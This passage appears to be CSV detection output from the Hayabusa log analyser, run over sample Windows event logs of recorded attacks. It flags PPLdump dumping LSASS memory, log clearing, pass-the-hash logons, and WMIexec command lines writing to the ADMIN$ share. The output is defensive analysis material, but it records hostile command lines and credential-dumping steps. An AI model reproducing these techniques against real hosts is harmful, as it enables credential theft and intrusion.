+09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.dmp | Process: C:\Windows\system32\services.exe | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CredAccess,LSASS Memory Dump File 
Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.307 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\PPLdump.exe | PID: 6316 | PGUID: 
747F3D96-F415-6081-0000-001040FE4900,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:27.649 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 424 | Src PGUID: 747F3D96-6E19-6082-0000-0010A5530000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:27.653 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.260 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\lsass.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 652 | Src PGUID: 747F3D96-6E19-6082-0000-001070650000 | Tgt PID: 624 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010F6600000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent 
Cmd: ? | LID: 0x3e5 | PID: 6644 | PGUID: 747F3D96-F41F-6081-0000-001078834A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 624 | Src PGUID: 747F3D96-6E19-6082-0000-0010F6600000 | Tgt PID: 6644 | Tgt PGUID: 747F3D96-F41F-6081-0000-001078834A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 19:09:46.214 +09:00,srvdefender01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:10:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x3cc | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: 
admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 
- Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.258 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0xd44 | User: SRVDEFENDER01$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 
0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network 
Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution 
via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 
0x4da32af,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.418 
+09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.435 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x1b98 | User: SRVDEFENDER01$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB 